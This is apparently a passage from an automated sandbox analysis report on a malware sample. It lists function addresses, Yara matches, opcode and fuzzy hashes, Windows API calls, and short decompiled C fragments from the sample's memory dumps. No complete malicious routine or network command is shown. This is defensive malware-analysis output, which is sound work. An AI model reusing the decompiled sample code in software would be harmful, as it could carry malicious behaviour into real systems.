                                                                                            • Instruction ID: 49d7784d8a0569be7f310fce7155acdb6682f76c9da73906ed60fe27465bafd3
                                                                                            • Opcode Fuzzy Hash: c440f9c1553fc1cd4ebc448dcbed3eb7457a377a7944941ca68326c56012a5ab
                                                                                            • Instruction Fuzzy Hash: FD90027131114802D21161A98404716400697D1341F52C421B1814558D86D58892B162
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: a553146937814782ed9dadb12bf8ece81c5d03bdf4c211baa811553c2a2cff39
                                                                                            • Instruction ID: 53dfa046fb976488062ee6b23230f8cc4b455442e2d05a92cf7b94c0918869a8
                                                                                            • Opcode Fuzzy Hash: a553146937814782ed9dadb12bf8ece81c5d03bdf4c211baa811553c2a2cff39
                                                                                            • Instruction Fuzzy Hash: D090027120100802D20165E95408656400697E0341F52D021B6014555EC6A58892B171
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                                                            • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                                                            • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                                                            • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                                            0x004188d7
                                                                                            0x004188e2
                                                                                            0x004188ed
                                                                                            0x004188f1

                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID: F5A
                                                                                            • API String ID: 1279760036-683449296
                                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                            • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                            • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				L0041AD30( &_v68, 3);
				_t12 = E00409B50(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                            0x00407290
                                                                                            0x0040729f
                                                                                            0x004072a3
                                                                                            0x004072ae
                                                                                            0x004072be
                                                                                            0x004072ce
                                                                                            0x004072d3
                                                                                            0x004072da
                                                                                            0x004072dd
                                                                                            0x004072ea
                                                                                            0x004072ec
                                                                                            0x004072ee
                                                                                            0x0040730b
                                                                                            0x0040730b
                                                                                            0x00000000
                                                                                            0x0040730d
                                                                                            0x00407312

                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                                                            • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                                                            • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                                                            • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418A52, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 16%
                                                                                            			E00418A52(void* __eax) {

				asm("aaa");
				asm("lock add [ebx+0x12779ea5], dh");
				if (__eax - 0xf3 != 0) goto L3;
			}



                                                                                            0x00418a54
                                                                                            0x00418a58
                                                                                            0x00418a5f

                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 3bd2c82ff48f20ed964d79cf12bed9b90a8c82d76e2705db7727dfe2a4e2c091
                                                                                            • Instruction ID: d0150b8971ceddc5795b44e529aca20bef120f1c66f1aa03cf6f12733ebe6af1
                                                                                            • Opcode Fuzzy Hash: 3bd2c82ff48f20ed964d79cf12bed9b90a8c82d76e2705db7727dfe2a4e2c091
                                                                                            • Instruction Fuzzy Hash: B5F08CB12002046FDB14EF68DC99EEB7768EF85210F00859AFD499B242D935E95187F5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                            0x0041890f
                                                                                            0x00418917
                                                                                            0x0041892d
                                                                                            0x00418931

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                            • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                            • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                            • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                            • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                            0x00418943
                                                                                            0x0041895a
                                                                                            0x00418968

                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                            • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                            • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004188FE, Relevance: 1.5, APIs: 1, Instructions: 19memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004188FE(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t12;
				void* _t17;

				_t9 = _a4;
				_t4 = _t9 + 0xc74; // 0xc74
				E004191F0(_t17, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}





                                                                                            0x00418903
                                                                                            0x0041890f
                                                                                            0x00418917
                                                                                            0x0041892d
                                                                                            0x00418931

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 2520708ad68e7278e5ea3b8601334c6887d04528704efee228dbbc4f53d1a6b5
                                                                                            • Instruction ID: 26ee0229cad9f2cefab1a1fa05e853df0e5a08bc468ad9aa49d88128953133db
                                                                                            • Opcode Fuzzy Hash: 2520708ad68e7278e5ea3b8601334c6887d04528704efee228dbbc4f53d1a6b5
                                                                                            • Instruction Fuzzy Hash: B1E086B45042455FD710FF59D88189B7795BF81214B01855EEC5947703D131E529CBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: dbdca21faa64b76498dafc9f58e1d7469a8f77a78038d7d38a6d2525bc9b6b4f
                                                                                            • Instruction ID: c5e1b2fa8396eb4fff13d91fcf90d764080ea5f40c594a0ff6491357d6c96339
                                                                                            • Opcode Fuzzy Hash: dbdca21faa64b76498dafc9f58e1d7469a8f77a78038d7d38a6d2525bc9b6b4f
                                                                                            • Instruction Fuzzy Hash: 22B09B719015C5C5D711D7B14608727790177D0741F17C062E2020641A4778C4D1F5B6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 004157AD, Relevance: 7.6, Strings: 6, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Us$29`f$: $er-A$gent$urlmon.dll
                                                                                            • API String ID: 0-4074303579
                                                                                            • Opcode ID: b6c4ab1cdc4aae03e4bd964edcb427f13f6ed30767bcdbbd5296e0484f28b4aa
                                                                                            • Instruction ID: c536d369bde5977a879f50b56ad2c21429d1afbc438febb8e2872a0ab70f7f26
                                                                                            • Opcode Fuzzy Hash: b6c4ab1cdc4aae03e4bd964edcb427f13f6ed30767bcdbbd5296e0484f28b4aa
                                                                                            • Instruction Fuzzy Hash: 7241BE71905299DFDB12DF60C842BEEFB75EF82318F10019ED501AB241D2799A46C7EA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00415626, Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d48eaa90c63c8a66d7c241e441e5938072e6aff5088c0d3446d302c6827015fe
                                                                                            • Instruction ID: cc0a24b43cd3a6952c0c3431a46acb125f9a82b30da5b8901561ba0ed8d2b1c4
                                                                                            • Opcode Fuzzy Hash: d48eaa90c63c8a66d7c241e441e5938072e6aff5088c0d3446d302c6827015fe
                                                                                            • Instruction Fuzzy Hash: 250147B3E256426AE1006531BD01BF7B32CDEE2368F541A2BEC4ED1107F20F83A446DA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004157D6, Relevance: .1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2a493032772f4b2408a89e581a30801d580dbccb0d40002f6313e6a35295137b
                                                                                            • Instruction ID: 3f74159dae843b629d6e32c641b27561cc1d7973dccc32a7059733cf6380dcb7
                                                                                            • Opcode Fuzzy Hash: 2a493032772f4b2408a89e581a30801d580dbccb0d40002f6313e6a35295137b
                                                                                            • Instruction Fuzzy Hash: C001C936204291CFA717DF20C0969EAF7B1FFC3231B5016EEC1A24B482D125A98EC799
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00415680, Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 21737f868cc5ac5a1d8d27be8e44ca592cb2e38a34caa9d96e1e1f88bf89507c
                                                                                            • Instruction ID: 0e9ceb2391fcef0578c741a571d627f35def83ae9e1b284ff3420e19147d9182
                                                                                            • Opcode Fuzzy Hash: 21737f868cc5ac5a1d8d27be8e44ca592cb2e38a34caa9d96e1e1f88bf89507c
                                                                                            • Instruction Fuzzy Hash: 04D0A726A855E14947022D1528000ECF360D187230F58629BC4A9FB143D307850913E8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406AE2, Relevance: .0, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a37c518fd889eb731c770d2e3c4ee1d3a1d12fc9a7a60565875eecf296e7036
                                                                                            • Instruction ID: d615215d8d6775fbfae55720bf13624c936a2dc624b38e5a1a92f3f0171b211c
                                                                                            • Opcode Fuzzy Hash: 9a37c518fd889eb731c770d2e3c4ee1d3a1d12fc9a7a60565875eecf296e7036
                                                                                            • Instruction Fuzzy Hash: 59C01235B590540AC114181C6C542B4F768CB57218F1532B7D947F73818547C167064D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406AB8, Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: acdcbffb4a2c8def1346f74bcc731aa376c72c83d0ab10e19a990ceee613d79b
                                                                                            • Instruction ID: b38c6a37d99e870b26902cd87b98a80a83321b0aefda5082df6cc1d06c782df5
                                                                                            • Opcode Fuzzy Hash: acdcbffb4a2c8def1346f74bcc731aa376c72c83d0ab10e19a990ceee613d79b
                                                                                            • Instruction Fuzzy Hash: BFC0123660505547DA185D08A4442E5F375EB97218F3122D7D8057B241A1A7D46B4788
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE98A0, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 746141b6dfa208f0011bc30a1974685f6b78b9236e4d6d648233285104e2ea14
                                                                                            • Instruction ID: 94d7016108bcb3e69f31a3a67107c525f9f739ccc0c77db27227223d05c174b8
                                                                                            • Opcode Fuzzy Hash: 746141b6dfa208f0011bc30a1974685f6b78b9236e4d6d648233285104e2ea14
                                                                                            • Instruction Fuzzy Hash: C490026130100802D20361A94414616400AD7D1385F92C022F2414555D86658953F172
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9820, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5503b64ca29363a2d490962428ae92236dd2080c8e8f1503d7477a84cf71feff
                                                                                            • Instruction ID: aae892e41bc5ef3b222cb52757b077692278d173c419e604036f98c576e5545b
                                                                                            • Opcode Fuzzy Hash: 5503b64ca29363a2d490962428ae92236dd2080c8e8f1503d7477a84cf71feff
                                                                                            • Instruction Fuzzy Hash: 1690027124100802D24271A94404616400AA7D0381F92C022B1414554E86958A57FAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AEB040, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a48a1ce19d3bb698da0e73f8d041a6b41f3722096ef931a035248cba438f5aca
                                                                                            • Instruction ID: 51b49f055208276585c356be8b1da7e1a4a136d843aa9798d65bb0baf5898752
                                                                                            • Opcode Fuzzy Hash: a48a1ce19d3bb698da0e73f8d041a6b41f3722096ef931a035248cba438f5aca
                                                                                            • Instruction Fuzzy Hash: 979002A1601144434641B1A948044169016A7E1341392C131B1444560C86A88856F2A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE99D0, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4e819876f8aed5fb84e57db0e681b7b12a634ed79958ec1cab6dcecdacb7b9f7
                                                                                            • Instruction ID: ec4a244eb03438763618ce1937267b966996a6fb0dc48436918901f3a3ce7317
                                                                                            • Opcode Fuzzy Hash: 4e819876f8aed5fb84e57db0e681b7b12a634ed79958ec1cab6dcecdacb7b9f7
                                                                                            • Instruction Fuzzy Hash: 8E9002A121100442D20561A94404716404697E1341F52C022B3144554CC5698C62B165
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9950, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9be28b20360f032aac318b13fa276a8324d96d9651e24895673abf125dee42df
                                                                                            • Instruction ID: 8fca8f8de490219493eb4f6c5e6cbb55f607f43765ffa78eebda93e048b8b29b
                                                                                            • Opcode Fuzzy Hash: 9be28b20360f032aac318b13fa276a8324d96d9651e24895673abf125dee42df
                                                                                            • Instruction Fuzzy Hash: 819002A120140803D24165A94804617400697D0342F52C021B3054555E8A698C52B175
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9A80, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 775724cc5f0cf749b3c13a72da61a82e86900cd9c0baa4411739cfcb8f0d76aa
                                                                                            • Instruction ID: 2c6bf8a6d9ce84f63a469774a0f651a40d9031df004f898ed551246405818eee
                                                                                            • Opcode Fuzzy Hash: 775724cc5f0cf749b3c13a72da61a82e86900cd9c0baa4411739cfcb8f0d76aa
                                                                                            • Instruction Fuzzy Hash: 2590026120144842D24162A94804B1F810697E1342F92C029B5146554CC9558856B761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9A10, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 28ccc49c2e1cf796eb133cd290ad6cf435fdbd3bf756fbb233c6125d5526e769
                                                                                            • Instruction ID: c7f749d31d5f3cf7f5a83b9a1cc5f1016aa343f05ff4a228d865a3d9c0bf83b9
                                                                                            • Opcode Fuzzy Hash: 28ccc49c2e1cf796eb133cd290ad6cf435fdbd3bf756fbb233c6125d5526e769
                                                                                            • Instruction Fuzzy Hash: 4690027120140802D20161A94808757400697D0342F52C021B6154555E86A5C892B571
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AEA3B0, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3172aa77ac16bc6a52b5424bc58d6d7d373531dc2551bbe498a367d3390a8ca9
                                                                                            • Instruction ID: 62830cddfe0f47b2c0a0f935fc259ac9082bdfe5a8aa85889715b6499ad41ba0
                                                                                            • Opcode Fuzzy Hash: 3172aa77ac16bc6a52b5424bc58d6d7d373531dc2551bbe498a367d3390a8ca9
                                                                                            • Instruction Fuzzy Hash: 8490027120144402D24171A9844461B9006A7E0341F52C421F1415554C86558857F261
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9B00, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 860b2544bd2f710d6e31959689a4a26924382dd910a7d0a5bd11cd107421e00f
                                                                                            • Instruction ID: 966c47bb7f4ba278055c71e6a5eeda003a279d46d6bab11cc6071501de5beb36
                                                                                            • Opcode Fuzzy Hash: 860b2544bd2f710d6e31959689a4a26924382dd910a7d0a5bd11cd107421e00f
                                                                                            • Instruction Fuzzy Hash: E490026124100C02D24171A984147174007D7D0741F52C021B1014554D86568966B6F1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE95F0, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 149b347131c0a5a68ca7a64b799558e56d22b275f63c069e08fb2f28133a5fe2
                                                                                            • Instruction ID: 0458f2835e1256765c4cb2688ab716889b7512a2d1835e9c4bed35681ef31e6b
                                                                                            • Opcode Fuzzy Hash: 149b347131c0a5a68ca7a64b799558e56d22b275f63c069e08fb2f28133a5fe2
                                                                                            • Instruction Fuzzy Hash: 2F90027120100C02D20561A94804696400697D0341F52C021B7014655E96A58892B171
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9520, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6e4ed76cfe24963bbcc3ba10eec6ed2d69731cbf9e36515371d3bde3a7c42172
                                                                                            • Instruction ID: 84b1618b610988a960aedcd15e00e4bd65072fe28972374194184d8f6105c2ff
